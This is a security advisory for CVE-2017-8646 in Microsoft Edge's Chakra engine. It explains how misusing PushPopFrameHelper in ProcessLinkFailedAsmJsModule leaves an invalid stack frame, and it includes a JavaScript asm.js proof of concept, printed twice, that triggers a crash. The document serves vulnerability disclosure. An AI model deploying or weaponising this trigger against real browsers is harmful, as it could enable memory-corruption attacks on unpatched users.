Microsoft Edge: Chakra: Incorrect usage of PushPopFrameHelper in InterpreterStackFrame::ProcessLinkFailedAsmJsModule(CVE-2017-8646)

2017-08-1700:00:00

Root

www.seebug.org

EPSS

0.913

Percentile

98.9%

JSON

PushPopFrameHelper is a class that pushes the current stack frame object in its constructor and pops it in the destructor. So it should be used like “PushPopFrameHelper holder(…)”, but InterpreterStackFrame::ProcessLinkFailedAsmJsModule uses it like a function.

Var InterpreterStackFrame::ProcessLinkFailedAsmJsModule()
{
    ...
    PushPopFrameHelper(newInstance, _ReturnAddress(), _AddressOfReturnAddress());
    ...
}

It pushes “newInstance” and immediately pop it.

The PoC will crash in the following code.

void BailOutRecord::ScheduleLoopBodyCodeGen(Js::ScriptFunction * function, Js::ScriptFunction * innerMostInlinee, BailOutRecord const * bailOutRecord, IR::BailOutKind bailOutKind)
{
    ...
    Js::InterpreterStackFrame * interpreterFrame = executeFunction-&gt;GetScriptContext()-&gt;GetThreadContext()-&gt;GetLeafInterpreterFrame(); &lt;&lt;-- Invalid stack frame object
    loopHeader = executeFunction-&gt;GetLoopHeader(interpreterFrame-&gt;GetCurrentLoopNum()); &lt;&lt;-- interpreterFrame-&gt;GetCurrentLoopNum() == -1
    ...
}

PoC:

function asmModule() {
    'use asm';

    let a = [1, 2, 3, 4];
    for (let i = 0; i &lt; 0x100000; i++) {  // JIT
        a[0] = 1;
        if (i === 0x30000) {
            a[0] = {};  // the array type changed, bailout!!
        }
    }

    function f(v) {
        v = v | 0;
        return v | 0;
    }
    return f;
}

asmModule(1);


                                                function asmModule() {
    'use asm';

    let a = [1, 2, 3, 4];
    for (let i = 0; i < 0x100000; i++) {  // JIT
        a[0] = 1;
        if (i === 0x30000) {
            a[0] = {};  // the array type changed, bailout!!
        }
    }

    function f(v) {
        v = v | 0;
        return v | 0;
    }
    return f;
}

asmModule(1);